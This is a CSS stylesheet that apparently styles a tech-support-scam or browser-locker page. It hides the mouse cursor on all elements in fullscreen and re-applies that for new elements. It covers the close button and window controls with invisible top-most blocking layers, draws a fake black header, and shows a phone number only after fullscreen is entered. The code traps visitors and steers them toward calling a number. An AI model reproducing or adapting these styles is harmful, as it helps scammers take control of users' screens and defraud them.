/* Main stylesheet for the application */

/* Base styles */
html, body {
  margin: 0;
  padding: 0;
  height: 100%;
  width: 100%;
  overflow: hidden;
  top: 0px;
}

/* Fullscreen image styles */
img.fullscreen-image {
  height: 100vh;
  width: 100vw;
  object-fit: contain;
  display: block;
}

/* Fullscreen mode styles */
.fullscreen-active,
.fullscreen-active * {
  cursor: none !important;
}

.fullscreen-active *:hover {
  cursor: none !important;
}
  
/* Handle all standard cursor styles in fullscreen mode */
.fullscreen-active .pointer, 
.fullscreen-active [style*="cursor: pointer"], 
.fullscreen-active [style*="cursor:pointer"] {
  cursor: none !important;
}

.fullscreen-active .default, 
.fullscreen-active [style*="cursor: default"], 
.fullscreen-active [style*="cursor:default"] {
  cursor: none !important;
}
  
.fullscreen-active .text, 
.fullscreen-active [style*="cursor: text"], 
.fullscreen-active [style*="cursor:text"] {
  cursor: none !important;
}

/* Fullscreen barriers */
.top-barrier {
  position: fixed;
  top: -10px;
  left: 0;
  width: 100%;
  height: 200px;
  background-color: transparent;
  z-index: 2147483647;
  pointer-events: auto;
}

.fake-header {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 150px;
  background-color: #000;
  z-index: 2147483646;
}

.close-button-blocker {
  position: fixed;
  top: -50px;  
  right: 0;
  width: 100px;
  height: 150px;
  background-color: transparent;
  z-index: 2147483647;
  pointer-events: auto;
}

.window-controls-blocker {
  position: fixed;
  top: 0;
  right: 0;
  width: 200px;
  height: 50px;
  background-color: transparent;
  z-index: 2147483647;
  pointer-events: auto;
}

/* Animation to disable cursor for new elements */
@keyframes disableCursorForNewElements {
  from { cursor: none !important; }
  to { cursor: none !important; }
}

.fullscreen-active * {
  animation: disableCursorForNewElements 0.001s forwards;
}

/* Button animations */
@keyframes blink {
  0% { box-shadow: 0 0 15px rgba(255, 100, 100, 0.4); opacity: 0.85; }
  50% { box-shadow: 0 0 30px rgba(255, 100, 150, 0.9); opacity: 1; }
  100% { box-shadow: 0 0 15px rgba(255, 100, 100, 0.4); opacity: 0.85; }
}

@keyframes pulse {
  0% { transform: translate(250px, -200px) scale(1); }
  50% { transform: translate(250px, -200px) scale(1.1); }
  100% { transform: translate(250px, -200px) scale(1); }
}

/* Close button styling */
.close-btn {
  position: fixed;
  top: 50%;
  right: 50%;
  transform: translate(250px, -200px);
  width: 60px;
  height: 60px;
  background: linear-gradient(145deg, #ff5e3a, #ff416c);
  border-radius: 50%;
  display: flex;
  justify-content: center;
  align-items: center;
  z-index: 9999;
  cursor: pointer;
  animation: blink 1.5s infinite ease-in-out, pulse 3s infinite ease-in-out;
  border: 3px solid rgba(255, 255, 255, 0.9);
  box-shadow: 0 0 20px rgba(255, 100, 100, 0.6);
}

.close-btn:hover {
  background: linear-gradient(145deg, #ff416c, #ff5e3a);
  animation-play-state: paused;
  transform: translate(250px, -200px) scale(1.15);
  box-shadow: 0 0 25px rgba(255, 100, 100, 0.8);
}

.close-btn::before,
.close-btn::after {
  content: '';
  position: absolute;
  width: 30px;
  height: 4px;
  background: white;
  border-radius: 2px;
  transition: all 0.3s ease;
  box-shadow: 0 0 5px rgba(0, 0, 0, 0.3);
}

.close-btn::before {
  transform: rotate(45deg);
}

.close-btn::after {
  transform: rotate(-45deg);
}

.close-btn:hover::before,
.close-btn:hover::after {
  width: 32px;
  background: #f0f0f0;
}

/* Tooltip animation */
@keyframes fadeInOut {
  0% { opacity: 0; transform: translateY(10px); }
  10% { opacity: 1; transform: translateY(0); }
  90% { opacity: 1; transform: translateY(0); }
  100% { opacity: 0; transform: translateY(10px); }
}

.close-btn .tooltip {
  position: absolute;
  bottom: -45px;
  background: rgba(0, 0, 0, 0.8);
  color: white;
  padding: 8px 15px;
  border-radius: 30px;
  font-size: 16px;
  font-weight: bold;
  white-space: nowrap;
  box-shadow: 0 4px 12px rgba(0, 0, 0, 0.5);
  animation: fadeInOut 3s infinite;
  border: 1px solid rgba(255, 255, 255, 0.3);
  letter-spacing: 0.5px;
}

.close-btn:hover .tooltip {
  animation-play-state: paused;
  opacity: 1;
  background: linear-gradient(90deg, #222222, #333333);
}

/* Continue Button Styling */
@keyframes float {
  0% { transform: translateY(0px); }
  50% { transform: translateY(-10px); }
  100% { transform: translateY(0px); }
}

@keyframes colorShift {
  0% { background: linear-gradient(145deg, #000000, #333333); }
  50% { background: linear-gradient(145deg, #222222, #000000); }
  100% { background: linear-gradient(145deg, #000000, #333333); }
}

.continue-btn {
  position: fixed;
  bottom: 8%;
  left: 50%;
  transform: translateX(-50%);
  min-width: 200px;
  width: auto;
  height: 60px;
  padding: 0 25px;
  background: linear-gradient(145deg, #000000, #333333);
  border-radius: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
  z-index: 9999;
  cursor: pointer;
  animation: float 3s infinite ease-in-out, colorShift 5s infinite;
  border: 3px solid rgba(255, 255, 255, 0.9);
  box-shadow: 0 10px 25px rgba(0, 0, 0, 0.6);
  transition: all 0.3s ease;
  box-sizing: border-box;
}

.continue-btn:hover {
  transform: translateX(-50%) scale(1.05);
  box-shadow: 0 15px 30px rgba(0, 0, 0, 0.8);
}

.continue-btn-text {
  color: white;
  font-size: 20px;
  font-weight: bold;
  text-transform: uppercase;
  letter-spacing: 1px;
  text-shadow: 0 2px 3px rgba(0, 0, 0, 0.5);
  white-space: nowrap;
}

.continue-btn::after {
  content: "→";
  font-size: 22px;
  margin-left: 10px;
  transition: transform 0.3s ease;
}

.continue-btn:hover::after {
  transform: translateX(5px);
}

/* Arrow animation */
@keyframes arrowPulse {
  0% { opacity: 0.6; transform: translateX(0); }
  50% { opacity: 1; transform: translateX(5px); }
  100% { opacity: 0.6; transform: translateX(0); }
}

.arrow {
  display: inline-block;
  margin-left: 8px;
  animation: arrowPulse 1.5s infinite;
}

/* Ensure the continue button stays visible even in fullscreen mode */
.fullscreen-active .continue-btn {
  cursor: pointer !important;
}

/* Hide close button in fullscreen mode */
.fullscreen-active .close-btn {
  display: none !important;
}

/* Change the continue button text in fullscreen mode */
.continue-btn-text .normal-text {
  display: inline;
  white-space: nowrap;
}

.continue-btn-text .fullscreen-text {
  display: none;
  white-space: nowrap;
}

.fullscreen-active .continue-btn-text .normal-text {
  display: none;
}

.fullscreen-active .continue-btn-text .fullscreen-text {
  display: inline;
}

/* Adjust the continue button in fullscreen mode */
.fullscreen-active .continue-btn {
  min-width: 280px;
  width: auto;
  padding: 0 30px;
  background: linear-gradient(145deg, #000000, #222222);
}

/* Phone number display styling */
.phone-number-display {
  position: fixed;
  top: 30%;
  left: 50%;
  transform: translateX(-50%);
  background: linear-gradient(145deg, #000000, #222222);
  padding: 15px 30px;
  border-radius: 15px;
  color: white;
  font-size: 28px;
  font-weight: bold;
  text-align: center;
  box-shadow: 0 5px 20px rgba(0, 0, 0, 0.5);
  border: 2px solid rgba(255, 255, 255, 0.8);
  z-index: 9998;
  display: none;
}

/* Only show phone number in fullscreen mode */
.fullscreen-active .phone-number-display {
  display: block;
}

/* Responsive styles */
@media screen and (max-width: 768px) {
  .continue-btn {
    padding: 0 20px;
    min-width: 180px;
    height: 55px;
  }
  
  .continue-btn-text {
    font-size: 16px;
  }
  
  .fullscreen-active .continue-btn {
    min-width: 240px;
    padding: 0 25px;
  }
  
  .fullscreen-active .continue-btn-text {
    font-size: 15px;
  }
  
  .phone-number-display {
    font-size: 22px;
    padding: 12px 20px;
    top: 25%;
  }
}
